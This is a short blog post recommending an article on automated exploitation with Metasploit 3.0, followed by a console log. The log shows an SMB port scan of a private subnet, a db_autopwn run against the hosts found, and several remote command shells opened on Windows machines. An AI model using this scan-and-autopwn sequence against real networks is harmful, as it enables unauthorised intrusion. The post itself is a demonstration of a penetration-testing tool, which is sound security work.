Metasploit 3.0 Automated Exploitation
H.D. Moore has released a great article on performing automated exploitation using Metasploit 3.0. To obtain the latest MSF 3.0 source code you require svn. To perform the actual exploitation you'll require Ruby, PostgreSQL and RubyGems. The article provides a great explanation of setting everything up and running the automated exploitation. There's also console output to show you exactly what you type and what happens. It's definitely worth the read, and once I play with it a bit, I'll be throwing my comments and results up here for everyone to read.
Peace,
HT
Console Output:
-----
$ ./msfconsole
=[ msf v3.0-beta-2-svn
+ -- --=[ 102 exploits - 93 payloads
+ -- --=[ 17 encoders - 4 nops
=[ 13 aux
msf > load db_postgres
[*] Successfully loaded plugin: db_postgres
msf > db_create
dropdb: database removal failed: ERROR: database "metasploit3" does not exist
CREATE DATABASE
ERROR: table "hosts" does not exist
[ snip ]
msf > db_nmap -p 445 192.168.0.0/24
Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2006-09-17 22:49 CDT
Interesting ports on destructo (192.168.0.2):
PORT STATE SERVICE
445/tcp open microsoft-ds
Interesting ports on WIN2000DB.lan (192.168.0.106):
PORT STATE SERVICE
445/tcp open microsoft-ds
Interesting ports on WINXPSP0.lan (192.168.0.108):
PORT STATE SERVICE
445/tcp open microsoft-ds
Interesting ports on WIN2000SP4.lan (192.168.0.139):
PORT STATE SERVICE
445/tcp open microsoft-ds
Nmap finished: 256 IP addresses (8 hosts up) scanned in 12.493 seconds
msf > db_services
[*] Service: host=192.168.0.2 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.106 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.108 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.139 port=445 proto=tcp state=up name=microsoft-ds
msf > db_autopwn -p -t -e
[*] Analysis completed in 0.208992004394531 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against 192.168.0.106:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.0.108:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.0.2:445...
[ snip ]
[*] Calling the vulnerable function...
[*] Calling the vulnerable function...
[*] Trying to exploit Windows 2000 LAN Manager
[*] Bound to 6bffd098-a112-3610-9833-46c3f87e345a:1.0@ncacn_np:192.168.0.139[\BROWSER] ...
[*] Building the stub data...
[*] Unexpected DCERPC fault 0x000006f7
[*] Calling the vulnerable function...
[*] Command shell session 4 opened (192.168.0.145:60778 -> 192.168.0.139:26188)
[*] Unexpected DCERPC fault 0x000006f7
[*] Calling the vulnerable function...
[*] Command shell session 5 opened (192.168.0.145:47380 -> 192.168.0.106:27700)
msf > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.0.145:46858 -> 192.168.0.139:15441
2 Command shell 192.168.0.145:42700 -> 192.168.0.108:28199
3 Command shell 192.168.0.145:40966 -> 192.168.0.106:27915
4 Command shell 192.168.0.145:60778 -> 192.168.0.139:26188
5 Command shell 192.168.0.145:47380 -> 192.168.0.106:27700
msf > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>